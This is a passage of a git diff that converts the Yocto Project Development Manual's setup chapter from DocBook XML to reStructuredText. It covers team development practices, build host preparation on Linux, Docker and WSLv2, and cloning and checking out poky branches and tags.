+    six-core Xeons with 24 Gbytes of RAM and plenty of disk space). You
+    can help ensure efficiency by having any machines used for testing
+    or that run Autobuilders be as high performance as possible.
+
+    .. note::
+
+       Given sufficient processing power, you might also consider
+       building Yocto Project development containers to be run under
+       Docker, which is described later.
+
+3.  *Understand the Hardware Topology of the Environment:* Once you
+    understand the hardware involved and the make-up of the team, you
+    can understand the hardware topology of the development environment.
+    You can get a visual idea of the machines and their roles across the
+    development environment.
+
+4.  *Use Git as Your Source Control Manager (SCM):* Keeping your
+    :term:`Metadata` (i.e. recipes,
+    configuration files, classes, and so forth) and any software you are
+    developing under the control of an SCM system that is compatible
+    with the OpenEmbedded build system is advisable. Of all of the SCMs
+    supported by BitBake, the Yocto Project team strongly recommends using
+    :ref:`overview-manual/overview-manual-development-environment:git`.
+    Git is a distributed system
+    that is easy to back up, allows you to work remotely, and then
+    connects back to the infrastructure.
+
+    .. note::
+
+       For information about BitBake, see the
+       :doc:`bitbake:index`.
+
+    It is relatively easy to set up Git services and create
+    infrastructure like :yocto_git:`/`, which is based on
+    server software called ``gitolite`` with ``cgit`` being used to
+    generate the web interface that lets you view the repositories. The
+    ``gitolite`` software identifies users using SSH keys and allows
+    branch-based access controls to repositories that you can control as
+    little or as much as necessary.
+
+    .. note::
+
+       The setup of these services is beyond the scope of this manual.
+       However, sites such as the following exist that describe how to
+       perform setup:
+
+       -  `Gitolite <https://gitolite.com>`__: Information for
+          ``gitolite``.
+
+       -  `Interfaces, frontends, and
+          tools <https://git.wiki.kernel.org/index.php/Interfaces,_frontends,_and_tools>`__:
+          Documentation on how to create interfaces and frontends for
+          Git.
+
+5.  *Set up the Application Development Machines:* As mentioned earlier,
+    application developers are creating applications on top of existing
+    software stacks. Following are some best practices for setting up
+    machines used for application development:
+
+    -  Use a pre-built toolchain that contains the software stack
+       itself. Then, develop the application code on top of the stack.
+       This method works well for small numbers of relatively isolated
+       applications.
+
+    -  Keep your cross-development toolchains updated. You can do this
+       through provisioning either as new toolchain downloads or as
+       updates through a package update mechanism using ``opkg`` to
+       provide updates to an existing toolchain. The exact mechanics of
+       how and when to do this depend on local policy.
+
+    -  Use multiple toolchains installed locally into different
+       locations to allow development across versions.
+
+6.  *Set up the Core Development Machines:* As mentioned earlier, core
+    developers work on the contents of the operating system itself.
+    Following are some best practices for setting up machines used for
+    developing images:
+
+    -  Have the :term:`OpenEmbedded Build System` available on
+       the developer workstations so developers can run their own builds
+       and directly rebuild the software stack.
+
+    -  Keep the core system unchanged as much as possible and do your
+       work in layers on top of the core system. Doing so gives you a
+       greater level of portability when upgrading to new versions of
+       the core system or Board Support Packages (BSPs).
+
+    -  Share layers amongst the developers of a particular project and
+       contain the policy configuration that defines the project.
+
+7.  *Set up an Autobuilder:* Autobuilders are often the core of the
+    development environment. It is here that changes from individual
+    developers are brought together and centrally tested. Based on this
+    automated build and test environment, subsequent decisions about
+    releases can be made. Autobuilders also allow for "continuous
+    integration" style testing of software components and regression
+    identification and tracking.
+
+    See ":yocto_ab:`Yocto Project Autobuilder <>`" for more
+    information and links to buildbot. The Yocto Project team has found
+    this implementation works well in this role. A public example of
+    this is the Yocto Project Autobuilders, which the Yocto Project team
+    uses to test the overall health of the project.
+
+    The features of this system are:
+
+    -  Highlights when commits break the build.
+
+    -  Populates an :ref:`sstate
+       cache <overview-manual/overview-manual-concepts:shared state cache>` from which
+       developers can pull rather than requiring local builds.
+
+    -  Allows commit hook triggers, which trigger builds when commits
+       are made.
+
+    -  Allows triggering of automated image booting and testing under
+       the QuickEMUlator (QEMU).
+
+    -  Supports incremental build testing and from-scratch builds.
+
+    -  Shares output that allows developer testing and historical
+       regression investigation.
+
+    -  Creates output that can be used for releases.
+
+    -  Allows scheduling of builds so that resources can be used
+       efficiently.
+
+8.  *Set up Test Machines:* Use a small number of shared, high
+    performance systems for testing purposes. Developers can use these
+    systems for wider, more extensive testing while they continue to
+    develop locally using their primary development system.
+
+9.  *Document Policies and Change Flow:* The Yocto Project uses a
+    hierarchical structure and a pull model. Scripts exist to create and
+    send pull requests (i.e. ``create-pull-request`` and
+    ``send-pull-request``). This model is in line with other open source
+    projects where maintainers are responsible for specific areas of the
+    project and a single maintainer handles the final "top-of-tree"
+    merges.
+
+    .. note::
+
+       You can also use a more collective push model. The ``gitolite``
+       software supports both the push and pull models quite easily.
+
+    As with any development environment, it is important to document the
+    policy used as well as any main project guidelines so they are
+    understood by everyone. It is also a good idea to have
+    well-structured commit messages, which are usually a part of a
+    project's guidelines. Good commit messages are essential when
+    looking back in time and trying to understand why changes were made.
+
+    If you discover that changes are needed to the core layer of the
+    project, it is worth sharing those with the community as soon as
+    possible. Chances are if you have discovered the need for changes,
+    someone else in the community needs them also.
+
+10. *Development Environment Summary:* Aside from the previous steps,
+    some best practices exist within the Yocto Project development
+    environment. Consider the following:
+
+    -  Use :ref:`overview-manual/overview-manual-development-environment:git` as the source control
+       system.
+
+    -  Maintain your Metadata in layers that make sense for your
+       situation. See the ":ref:`overview-manual/overview-manual-yp-intro:the yocto project layer model`"
+       section in the Yocto Project Overview and Concepts Manual and the
+       ":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+       section for more information on layers.
+
+    -  Separate the project's Metadata and code by using separate Git
+       repositories. See the ":ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`"
+       section in the Yocto Project Overview and Concepts Manual for
+       information on these repositories. See the "`Locating Yocto
+       Project Source Files <#locating-yocto-project-source-files>`__"
+       section for information on how to set up local Git repositories
+       for related upstream Yocto Project Git repositories.
+
+    -  Set up the directory for the shared state cache
+       (:term:`SSTATE_DIR`) where
+       it makes sense. For example, set up the sstate cache on a system
+       used by developers in the same organization and share the same
+       source directories on their machines.
+
+    -  Set up an Autobuilder and have it populate the sstate cache and
+       source directories.
+
+    -  The Yocto Project community encourages you to send patches to the
+       project to fix bugs or add features. If you do submit patches,
+       follow the project commit guidelines for writing good commit
+       messages. See the
+       ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+       section.
+
+    -  Send changes to the core sooner than later as others are likely
+       to run into the same issues. For some guidance on mailing lists
+       to use, see the list in the
+       ":ref:`dev-manual/dev-manual-common-tasks:submitting a change to the yocto project`"
+       section. For a description
+       of the available mailing lists, see the ":ref:`resources-mailinglist`" section in
+       the Yocto Project Reference Manual.
+
+.. _dev-preparing-the-build-host:
+
+Preparing the Build Host
+========================
+
+This section provides procedures to set up a system to be used as your
+:term:`Build Host` for
+development using the Yocto Project. Your build host can be a native
+Linux machine (recommended), it can be a machine (Linux, Mac, or
+Windows) that uses `CROPS <https://github.com/crops/poky-container>`__,
+which leverages `Docker Containers <https://www.docker.com/>`__ or it
+can be a Windows machine capable of running Windows Subsystem For Linux
+v2 (WSL).
+
+.. note::
+
+   The Yocto Project is not compatible with
+   `Windows Subsystem for Linux v1 <https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux>`__.
+   It is compatible but not officially supported nor validated with
+   WSLv2. If you still decide to use WSL please upgrade to
+   `WSLv2 <https://docs.microsoft.com/en-us/windows/wsl/install-win10>`__.
+
+Once your build host is set up to use the Yocto Project, further steps
+are necessary depending on what you want to accomplish. See the
+following references for information on how to prepare for Board Support
+Package (BSP) development and kernel development:
+
+-  *BSP Development:* See the ":ref:`bsp-guide/bsp:preparing your build host to work with bsp layers`"
+   section in the Yocto Project Board Support Package (BSP) Developer's
+   Guide.
+
+-  *Kernel Development:* See the ":ref:`kernel-dev/kernel-dev-common:preparing the build host to work on the kernel`"
+   section in the Yocto Project Linux Kernel Development Manual.
+
+Setting Up a Native Linux Host
+------------------------------
+
+Follow these steps to prepare a native Linux machine as your Yocto
+Project Build Host:
+
+1. *Use a Supported Linux Distribution:* You should have a reasonably
+   current Linux-based host system. You will have the best results with
+   a recent release of Fedora, openSUSE, Debian, Ubuntu, RHEL or CentOS
+   as these releases are frequently tested against the Yocto Project and
+   officially supported. For a list of the distributions under
+   validation and their status, see the ":ref:`Supported Linux
+   Distributions <detailed-supported-distros>`"
+   section in the Yocto Project Reference Manual and the wiki page at
+   :yocto_wiki:`Distribution Support </wiki/Distribution_Support>`.
+
+2. *Have Enough Free Memory:* Your system should have at least 50 Gbytes
+   of free disk space for building images.
+
+3. *Meet Minimal Version Requirements:* The OpenEmbedded build system
+   should be able to run on any modern distribution that has the
+   following versions for Git, tar, Python and gcc.
+
+   -  Git 1.8.3.1 or greater
+
+   -  tar 1.28 or greater
+
+   -  Python 3.5.0 or greater.
+
+   -  gcc 5.0 or greater.
+
+   If your build host does not meet any of these three listed version
+   requirements, you can take steps to prepare the system so that you
+   can still use the Yocto Project. See the
+   ":ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`"
+   section in the Yocto Project Reference Manual for information.
+
+4. *Install Development Host Packages:* Required development host
+   packages vary depending on your build host and what you want to do
+   with the Yocto Project. Collectively, the number of required packages
+   is large if you want to be able to cover all cases.
+
+   For lists of required packages for all scenarios, see the
+   ":ref:`ref-manual/ref-system-requirements:required packages for the build host`"
+   section in the Yocto Project Reference Manual.
+
+Once you have completed the previous steps, you are ready to continue
+using a given development path on your native Linux machine. If you are
+going to use BitBake, see the
+":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+section. If you are going
+to use the Extensible SDK, see the ":doc:`../sdk-manual/sdk-extensible`" Chapter in the Yocto
+Project Application Development and the Extensible Software Development
+Kit (eSDK) manual. If you want to work on the kernel, see the :doc:`../kernel-dev/kernel-dev`. If you are going to use
+Toaster, see the ":doc:`../toaster-manual/toaster-manual-setup-and-use`"
+section in the Toaster User Manual.
+
+.. _setting-up-to-use-crops:
+
+Setting Up to Use CROss PlatformS (CROPS)
+-----------------------------------------
+
+With `CROPS <https://github.com/crops/poky-container>`__, which
+leverages `Docker Containers <https://www.docker.com/>`__, you can
+create a Yocto Project development environment that is operating system
+agnostic. You can set up a container in which you can develop using the
+Yocto Project on a Windows, Mac, or Linux machine.
+
+Follow these general steps to prepare a Windows, Mac, or Linux machine
+as your Yocto Project build host:
+
+1. *Determine What Your Build Host Needs:*
+   `Docker <https://www.docker.com/what-docker>`__ is a software
+   container platform that you need to install on the build host.
+   Depending on your build host, you might have to install different
+   software to support Docker containers. Go to the Docker installation
+   page and read about the platform requirements in "`Supported
+   Platforms <https://docs.docker.com/engine/install/#supported-platforms>`__"
+   your build host needs to run containers.
+
+2. *Choose What To Install:* Depending on whether or not your build host
+   meets system requirements, you need to install "Docker CE Stable" or
+   the "Docker Toolbox". Most situations call for Docker CE. However, if
+   you have a build host that does not meet requirements (e.g.
+   Pre-Windows 10 or Windows 10 "Home" version), you must install Docker
+   Toolbox instead.
+
+3. *Go to the Install Site for Your Platform:* Click the link for the
+   Docker edition associated with your build host's native software. For
+   example, if your build host is running Microsoft Windows Version 10
+   and you want the Docker CE Stable edition, click that link under
+   "Supported Platforms".
+
+4. *Install the Software:* Once you have understood all the
+   pre-requisites, you can download and install the appropriate
+   software. Follow the instructions for your specific machine and the
+   type of the software you need to install:
+
+   -  Install `Docker CE for
+      Windows <https://docs.docker.com/docker-for-windows/install/#install-docker-desktop-on-windows>`__
+      for Windows build hosts that meet requirements.
+
+   -  Install `Docker CE for
+      MacOs <https://docs.docker.com/docker-for-mac/install/#install-and-run-docker-desktop-on-mac>`__
+      for Mac build hosts that meet requirements.
+
+   -  Install `Docker Toolbox for
+      Windows <https://docs.docker.com/toolbox/toolbox_install_windows/>`__
+      for Windows build hosts that do not meet Docker requirements.
+
+   -  Install `Docker Toolbox for
+      MacOS <https://docs.docker.com/toolbox/toolbox_install_mac/>`__
+      for Mac build hosts that do not meet Docker requirements.
+
+   -  Install `Docker CE for
+      CentOS <https://docs.docker.com/install/linux/docker-ce/centos/>`__
+      for Linux build hosts running the CentOS distribution.
+
+   -  Install `Docker CE for
+      Debian <https://docs.docker.com/install/linux/docker-ce/debian/>`__
+      for Linux build hosts running the Debian distribution.
+
+   -  Install `Docker CE for
+      Fedora <https://docs.docker.com/install/linux/docker-ce/fedora/>`__
+      for Linux build hosts running the Fedora distribution.
+
+   -  Install `Docker CE for
+      Ubuntu <https://docs.docker.com/install/linux/docker-ce/ubuntu/>`__
+      for Linux build hosts running the Ubuntu distribution.
+
+5. *Optionally Orient Yourself With Docker:* If you are unfamiliar with
+   Docker and the container concept, you can learn more here -
+   https://docs.docker.com/get-started/.
+
+6. *Launch Docker or Docker Toolbox:* You should be able to launch
+   Docker or the Docker Toolbox and have a terminal shell on your
+   development host.
+
+7. *Set Up the Containers to Use the Yocto Project:* Go to
+   https://github.com/crops/docker-win-mac-docs/wiki and follow
+   the directions for your particular build host (i.e. Linux, Mac, or
+   Windows).
+
+   Once you complete the setup instructions for your machine, you have
+   the Poky, Extensible SDK, and Toaster containers available. You can
+   click those links from the page and learn more about using each of
+   those containers.
+
+Once you have a container set up, everything is in place to develop just
+as if you were running on a native Linux machine. If you are going to
+use the Poky container, see the
+":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+section. If you are going to use the Extensible SDK container, see the
+":doc:`../sdk-manual/sdk-extensible`" Chapter in the Yocto
+Project Application Development and the Extensible Software Development
+Kit (eSDK) manual. If you are going to use the Toaster container, see
+the ":doc:`../toaster-manual/toaster-manual-setup-and-use`"
+section in the Toaster User Manual.
+
+.. _setting-up-to-use-wsl:
+
+Setting Up to Use Windows Subsystem For Linux (WSLv2)
+-----------------------------------------------------
+
+With `Windows Subsystem for Linux
+(WSLv2) <https://docs.microsoft.com/en-us/windows/wsl/wsl2-about>`__,
+you can create a Yocto Project development environment that allows you
+to build on Windows. You can set up a Linux distribution inside Windows
+in which you can develop using the Yocto Project.
+
+Follow these general steps to prepare a Windows machine using WSLv2 as
+your Yocto Project build host:
+
+1. *Make sure your Windows 10 machine is capable of running WSLv2:*
+   WSLv2 is only available for Windows 10 builds > 18917. To check which
+   build version you are running, you may open a command prompt on
+   Windows and execute the command "ver".
+   ::
+
+      C:\Users\myuser> ver
+
+      Microsoft Windows [Version 10.0.19041.153]
+
+   If your build is capable of running
+   WSLv2 you may continue, for more information on this subject or
+   instructions on how to upgrade to WSLv2 visit `Windows 10
+   WSLv2 <https://docs.microsoft.com/en-us/windows/wsl/wsl2-install>`__
+
+2. *Install the Linux distribution of your choice inside Windows 10:*
+   Once you know your version of Windows 10 supports WSLv2, you can
+   install the distribution of your choice from the Microsoft Store.
+   Open the Microsoft Store and search for Linux. While there are
+   several Linux distributions available, the assumption is that your
+   pick will be one of the distributions supported by the Yocto Project
+   as stated on the instructions for using a native Linux host. After
+   making your selection, simply click "Get" to download and install the
+   distribution.
+
+3. *Check your Linux distribution is using WSLv2:* Open a Windows
+   PowerShell and run:
+   ::
+
+      C:\WINDOWS\system32> wsl -l -v
+      NAME    STATE   VERSION
+      *Ubuntu Running 2
+
+   Note the version column which says the WSL version
+   being used by your distribution, on compatible systems, this can be
+   changed back at any point in time.
+
+4. *Optionally Orient Yourself on WSL:* If you are unfamiliar with WSL,
+   you can learn more here -
+   https://docs.microsoft.com/en-us/windows/wsl/wsl2-about.
+
+5. *Launch your WSL Distibution:* From the Windows start menu simply
+   launch your WSL distribution just like any other application.
+
+6. *Optimize your WSLv2 storage often:* Due to the way storage is
+   handled on WSLv2, the storage space used by the undelying Linux
+   distribution is not reflected immedately, and since bitbake heavily
+   uses storage, after several builds, you may be unaware you are
+   running out of space. WSLv2 uses a VHDX file for storage, this issue
+   can be easily avoided by manually optimizing this file often, this
+   can be done in the following way:
+
+   1. *Find the location of your VHDX file:* First you need to find the
+      distro app package directory, to achieve this open a Windows
+      Powershell as Administrator and run:
+      ::
+
+         C:\WINDOWS\system32> Get-AppxPackage -Name "*Ubuntu*" | Select PackageFamilyName
+         PackageFamilyName
+         -----------------
+         CanonicalGroupLimited.UbuntuonWindows_79abcdefgh
+
+
+      You should now
+      replace the PackageFamilyName and your user on the following path
+      to find your VHDX file:
+      ::
+
+          ls C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\
+          Mode                 LastWriteTime         Length Name
+          -a----         3/14/2020   9:52 PM    57418973184 ext4.vhdx
+
+      Your VHDX file path is:
+      ``C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\ext4.vhdx``
+
+   2. *Optimize your VHDX file:* Open a Windows Powershell as
+      Administrator to optimize your VHDX file, shutting down WSL first:
+      ::
+
+         C:\WINDOWS\system32> wsl --shutdown
+         C:\WINDOWS\system32> optimize-vhd -Path C:\Users\myuser\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79abcdefgh\LocalState\ext4.vhdx -Mode full
+
+      A progress bar should be shown while optimizing the
+      VHDX file, and storage should now be reflected correctly on the
+      Windows Explorer.
+
+.. note::
+
+   The current implementation of WSLv2 does not have out-of-the-box
+   access to external devices such as those connected through a USB
+   port, but it automatically mounts your ``C:`` drive on ``/mnt/c/``
+   (and others), which you can use to share deploy artifacts to be later
+   flashed on hardware through Windows, but your build directory should
+   not reside inside this mountpoint.
+
+Once you have WSLv2 set up, everything is in place to develop just as if
+you were running on a native Linux machine. If you are going to use the
+Extensible SDK container, see the ":doc:`../sdk-manual/sdk-extensible`" Chapter in the Yocto
+Project Application Development and the Extensible Software Development
+Kit (eSDK) manual. If you are going to use the Toaster container, see
+the ":doc:`../toaster-manual/toaster-manual-setup-and-use`"
+section in the Toaster User Manual.
+
+Locating Yocto Project Source Files
+===================================
+
+This section shows you how to locate, fetch and configure the source
+files you'll need to work with the Yocto Project.
+
+.. note::
+
+   -  For concepts and introductory information about Git as it is used
+      in the Yocto Project, see the ":ref:`overview-manual/overview-manual-development-environment:git`"
+      section in the Yocto Project Overview and Concepts Manual.
+
+   -  For concepts on Yocto Project source repositories, see the
+      ":ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`"
+      section in the Yocto Project Overview and Concepts Manual."
+
+Accessing Source Repositories
+-----------------------------
+
+Working from a copy of the upstream :ref:`dev-manual/dev-manual-start:accessing source repositories` is the
+preferred method for obtaining and using a Yocto Project release. You
+can view the Yocto Project Source Repositories at
+:yocto_git:`/`. In particular, you can find the ``poky``
+repository at :yocto_git:`/cgit.cgi/poky`.
+
+Use the following procedure to locate the latest upstream copy of the
+``poky`` Git repository:
+
+1. *Access Repositories:* Open a browser and go to
+   :yocto_git:`/` to access the GUI-based interface into the
+   Yocto Project source repositories.
+
+2. *Select the Repository:* Click on the repository in which you are
+   interested (e.g. ``poky``).
+
+3. *Find the URL Used to Clone the Repository:* At the bottom of the
+   page, note the URL used to clone that repository
+   (e.g. :yocto_git:`/cgit.cgi/poky`).
+
+   .. note::
+
+      For information on cloning a repository, see the
+      ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`" section.
+
+Accessing Index of Releases
+---------------------------
+
+Yocto Project maintains an Index of Releases area that contains related
+files that contribute to the Yocto Project. Rather than Git
+repositories, these files are tarballs that represent snapshots in time
+of a given component.
+
+.. note::
+
+   The recommended method for accessing Yocto Project components is to
+   use Git to clone the upstream repository and work from within that
+   locally cloned repository. The procedure in this section exists
+   should you desire a tarball snapshot of any given component.
+
+Follow these steps to locate and download a particular tarball:
+
+1. *Access the Index of Releases:* Open a browser and go to
+   :yocto_dl:`Index of Releases </releases>`. The
+   list represents released components (e.g. ``bitbake``, ``sato``, and
+   so on).
+
+   .. note::
+
+      The ``yocto`` directory contains the full array of released Poky
+      tarballs. The ``poky`` directory in the Index of Releases was
+      historically used for very early releases and exists now only for
+      retroactive completeness.
+
+2. *Select a Component:* Click on any released component in which you
+   are interested (e.g. ``yocto``).
+
+3. *Find the Tarball:* Drill down to find the associated tarball. For
+   example, click on ``yocto-&DISTRO;`` to view files associated with the
+   Yocto Project &DISTRO; release (e.g.
+   ``&YOCTO_POKY;.tar.bz2``, which is the
+   released Poky tarball).
+
+4. *Download the Tarball:* Click the tarball to download and save a
+   snapshot of the given component.
+
+Using the Downloads Page
+------------------------
+
+The :yocto_home:`Yocto Project Website <>` uses a "RELEASES" page
+from which you can locate and download tarballs of any Yocto Project
+release. Rather than Git repositories, these files represent snapshot
+tarballs similar to the tarballs located in the Index of Releases
+described in the "`Accessing Index of
+Releases <#accessing-index-of-releases>`__" section.
+
+.. note::
+
+   The recommended method for accessing Yocto Project components is to
+   use Git to clone a repository and work from within that local
+   repository. The procedure in this section exists should you desire a
+   tarball snapshot of any given component.
+
+1. *Go to the Yocto Project Website:* Open The
+   :yocto_home:`Yocto Project Website <>` in your browser.
+
+#. *Get to the Downloads Area:* Select the "RELEASES" item from the
+   pull-down "DEVELOPMENT" tab menu near the top of the page.
+
+#. *Select a Yocto Project Release:* On the top of the "RELEASE" page currently
+   supported releases are displayed, further down past supported Yocto Project
+   releases are visible. The "Download" links in the rows of the table there
+   will lead to the download tarballs for the release.
+
+   .. note::
+
+      For a "map" of Yocto Project releases to version numbers, see the
+      :yocto_wiki:`Releases </wiki/Releases>` wiki page.
+
+   You can use the "RELEASE ARCHIVE" link to reveal a menu of all Yocto
+   Project releases.
+
+#. *Download Tools or Board Support Packages (BSPs):* Next to the tarballs you
+   will find download tools or BSPs as well. Just select a Yocto Project
+   release and look for what you need.
+
+Accessing Nightly Builds
+------------------------
+
+Yocto Project maintains an area for nightly builds that contains tarball
+releases at https://autobuilder.yocto.io//pub/nightly/. These builds include Yocto
+Project releases ("poky"), toolchains, and builds for supported
+machines.
+
+Should you ever want to access a nightly build of a particular Yocto
+Project component, use the following procedure:
+
+1. *Locate the Index of Nightly Builds:* Open a browser and go to
+   https://autobuilder.yocto.io//pub/nightly/ to access the Nightly Builds.
+
+2. *Select a Date:* Click on the date in which you are interested. If
+   you want the latest builds, use "CURRENT".
+
+3. *Select a Build:* Choose the area in which you are interested. For
+   example, if you are looking for the most recent toolchains, select
+   the "toolchain" link.
+
+4. *Find the Tarball:* Drill down to find the associated tarball.
+
+5. *Download the Tarball:* Click the tarball to download and save a
+   snapshot of the given component.
+
+Cloning and Checking Out Branches
+=================================
+
+To use the Yocto Project for development, you need a release locally
+installed on your development system. This locally installed set of
+files is referred to as the :term:`Source Directory`
+in the Yocto Project documentation.
+
+The preferred method of creating your Source Directory is by using
+:ref:`overview-manual/overview-manual-development-environment:git` to clone a local copy of the upstream
+``poky`` repository. Working from a cloned copy of the upstream
+repository allows you to contribute back into the Yocto Project or to
+simply work with the latest software on a development branch. Because
+Git maintains and creates an upstream repository with a complete history
+of changes and you are working with a local clone of that repository,
+you have access to all the Yocto Project development branches and tag
+names used in the upstream repository.
+
+Cloning the ``poky`` Repository
+-------------------------------
+
+Follow these steps to create a local version of the upstream
+:term:`Poky` Git repository.
+
+1. *Set Your Directory:* Change your working directory to where you want
+   to create your local copy of ``poky``.
+
+2. *Clone the Repository:* The following example command clones the
+   ``poky`` repository and uses the default name "poky" for your local
+   repository:
+   ::
+
+      $ git clone git://git.yoctoproject.org/poky
+      Cloning into 'poky'...
+      remote: Counting objects: 432160, done.
+      remote: Compressing objects: 100% (102056/102056), done.
+      remote: Total 432160 (delta 323116), reused 432037 (delta 323000)
+      Receiving objects: 100% (432160/432160), 153.81 MiB | 8.54 MiB/s, done.
+      Resolving deltas: 100% (323116/323116), done.
+      Checking connectivity... done.
+
+   Unless you
+   specify a specific development branch or tag name, Git clones the
+   "master" branch, which results in a snapshot of the latest
+   development changes for "master". For information on how to check out
+   a specific development branch or on how to check out a local branch
+   based on a tag name, see the "`Checking Out By Branch in
+   Poky <#checking-out-by-branch-in-poky>`__" and `Checking Out By Tag
+   in Poky <#checkout-out-by-tag-in-poky>`__" sections, respectively.
+
+   Once the local repository is created, you can change to that
+   directory and check its status. Here, the single "master" branch
+   exists on your system and by default, it is checked out:
+   ::
+
+      $ cd ~/poky
+      $ git status
+      On branch master
+      Your branch is up-to-date with 'origin/master'.
+      nothing to commit, working directory clean
+      $ git branch
+      * master
+
+   Your local repository of poky is identical to the
+   upstream poky repository at the time from which it was cloned. As you
+   work with the local branch, you can periodically use the
+   ``git pull --rebase`` command to be sure you are up-to-date
+   with the upstream branch.
+
+Checking Out by Branch in Poky
+------------------------------
+
+When you clone the upstream poky repository, you have access to all its
+development branches. Each development branch in a repository is unique
+as it forks off the "master" branch. To see and use the files of a
+particular development branch locally, you need to know the branch name
+and then specifically check out that development branch.
+
+.. note::
+
+   Checking out an active development branch by branch name gives you a
+   snapshot of that particular branch at the time you check it out.
+   Further development on top of the branch that occurs after check it
+   out can occur.
+
+1. *Switch to the Poky Directory:* If you have a local poky Git
+   repository, switch to that directory. If you do not have the local
+   copy of poky, see the
+   ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+   section.
+
+2. *Determine Existing Branch Names:*
+   ::
+
+      $ git branch -a
+      * master
+      remotes/origin/1.1_M1
+      remotes/origin/1.1_M2
+      remotes/origin/1.1_M3
+      remotes/origin/1.1_M4
+      remotes/origin/1.2_M1
+      remotes/origin/1.2_M2
+      remotes/origin/1.2_M3
+      . . .
+      remotes/origin/thud
+      remotes/origin/thud-next
+      remotes/origin/warrior
+      remotes/origin/warrior-next
+      remotes/origin/zeus
+      remotes/origin/zeus-next
+      ... and so on ...
+
+3. *Check out the Branch:* Check out the development branch in which you
+   want to work. For example, to access the files for the Yocto Project
+   &DISTRO; Release (&DISTRO_NAME;), use the following command:
+   ::
+
+      $ git checkout -b &DISTRO_NAME_NO_CAP; origin/&DISTRO_NAME_NO_CAP;
+      Branch &DISTRO_NAME_NO_CAP; set up to track remote branch &DISTRO_NAME_NO_CAP; from origin.
+      Switched to a new branch '&DISTRO_NAME_NO_CAP;'
+
+   The previous command checks out the "&DISTRO_NAME_NO_CAP;" development
+   branch and reports that the branch is tracking the upstream
+   "origin/&DISTRO_NAME_NO_CAP;" branch.
+
+   The following command displays the branches that are now part of your
+   local poky repository. The asterisk character indicates the branch
+   that is currently checked out for work:
+   ::
+
+      $ git branch
+        master
+        * &DISTRO_NAME_NO_CAP;
+
+.. _checkout-out-by-tag-in-poky:
+
+Checking Out by Tag in Poky
+---------------------------
+
+Similar to branches, the upstream repository uses tags to mark specific
+commits associated with significant points in a development branch (i.e.
+a release point or stage of a release). You might want to set up a local
+branch based on one of those points in the repository. The process is
+similar to checking out by branch name except you use tag names.
+
+.. note::
+
+   Checking out a branch based on a tag gives you a stable set of files
+   not affected by development on the branch above the tag.
+
+1. *Switch to the Poky Directory:* If you have a local poky Git
+   repository, switch to that directory. If you do not have the local
+   copy of poky, see the
+   ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+   section.
+
+2. *Fetch the Tag Names:* To checkout the branch based on a tag name,
+   you need to fetch the upstream tags into your local repository:
+   ::
+
+      $ git fetch --tags
+      $
+
+3. *List the Tag Names:* You can list the tag names now:
+   ::
+
+      $ git tag
+      1.1_M1.final
+      1.1_M1.rc1
+      1.1_M1.rc2
+      1.1_M2.final
+      1.1_M2.rc1
+         .
+         .
+         .
+      yocto-2.5
+      yocto-2.5.1
+      yocto-2.5.2
+      yocto-2.5.3
+      yocto-2.6
+      yocto-2.6.1
+      yocto-2.6.2
+      yocto-2.7
+      yocto_1.5_M5.rc8
+
+
+4. *Check out the Branch:*
+   ::
+
+      $ git checkout tags/yocto-&DISTRO; -b my_yocto_&DISTRO;
+      Switched to a new branch 'my_yocto_&DISTRO;'
+      $ git branch
+        master
+      * my_yocto_&DISTRO;
+
+   The previous command creates and
+   checks out a local branch named "my_yocto_&DISTRO;", which is based on
+   the commit in the upstream poky repository that has the same tag. In
+   this example, the files you have available locally as a result of the
+   ``checkout`` command are a snapshot of the "&DISTRO_NAME_NO_CAP;"
+   development branch at the point where Yocto Project &DISTRO; was
+   released.
diff --git a/documentation/dev-manual/dev-manual-start.xml b/documentation/dev-manual/dev-manual-start.xml
deleted file mode 100644
index 8cb5631f0d..0000000000
--- a/documentation/dev-manual/dev-manual-start.xml
+++ /dev/null
@@ -1,1287 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='dev-manual-start'>
-
-<title>Setting Up to Use the Yocto Project</title>
-
-<para>
-    This chapter provides guidance on how to prepare to use the
-    Yocto Project.
-    You can learn about creating a team environment that develops using the
-    Yocto Project, how to set up a
-    <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>,
-    how to locate Yocto Project source repositories, and how to create local
-    Git repositories.
-</para>
-
-<section id="usingpoky-changes-collaborate">
-    <title>Creating a Team Development Environment</title>
-
-    <para>
-        It might not be immediately clear how you can use the Yocto
-        Project in a team development environment, or how to scale it for a
-        large team of developers.
-        You can adapt the Yocto Project to many different use cases and
-        scenarios;
-        however, this flexibility could cause difficulties if you are trying
-        to create a working setup that scales effectively.
-    </para>
-
-    <para>
-        To help you understand how to set up this type of environment,
-        this section presents a procedure that gives you information
-        that can help you get the results you want.
-        The procedure is high-level and presents some of the project's most
-        successful experiences, practices, solutions, and available
-        technologies that have proved to work well in the past;
-        however, keep in mind, the procedure here is simply a starting point.
-        You can build off these steps and customize the procedure to fit any
-        particular working environment and set of practices.
-        <orderedlist>
-            <listitem><para>
-                <emphasis>Determine Who is Going to be Developing:</emphasis>
-                You first need to understand who is going to be doing anything
-                related to the Yocto Project and determine their roles.
-                Making this determination is essential to completing
-                subsequent steps, which are to get your equipment together
-                and set up your development environment's hardware topology.
-                </para>
-
-                <para>The following roles exist:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis>Application Developer:</emphasis>
-                            This type of developer does application level work
-                            on top of an existing software stack.
